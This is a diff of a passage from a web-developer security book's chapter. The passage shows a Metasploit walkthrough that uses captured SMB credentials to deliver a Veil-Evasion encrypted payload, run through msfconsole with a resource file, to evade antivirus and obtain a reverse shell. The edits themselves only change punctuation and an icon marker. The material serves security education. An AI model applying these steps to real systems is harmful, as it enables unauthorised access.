binarymist/HolisticInfoSec-For-WebDevelopers-Fascicle0/manuscript/markdown/main/chapter10.md

 G> `set exe::custom /usr/share/veil-output/compiled/encrypted-payload.exe`
 G> `set smbuser <target username>`
 G> `set smbpass <target password>`
 G> `run`
+G>
 G> The IP addresses and ports need to be the same as you specified in the creating of the payload using Veil-Evasion.
-G> Now we’ve got the credentials from a previous exploit.
+G> Now we've got the credentials from a previous exploit.
 There are many techniques and tools to help capture these, whether you have physical access or not.
 We just need the username & password or hash which is transmitted across the network for all to see.
 Also easily obtainable if you have physical access to the machine.

-G>
+{icon=bomb}
 G> We now run msfconsole with the resource file as parameter:
 G> `msfconsole -r ~/demo.rc`
 G> and that's enough to evade AV and get our reverse shell.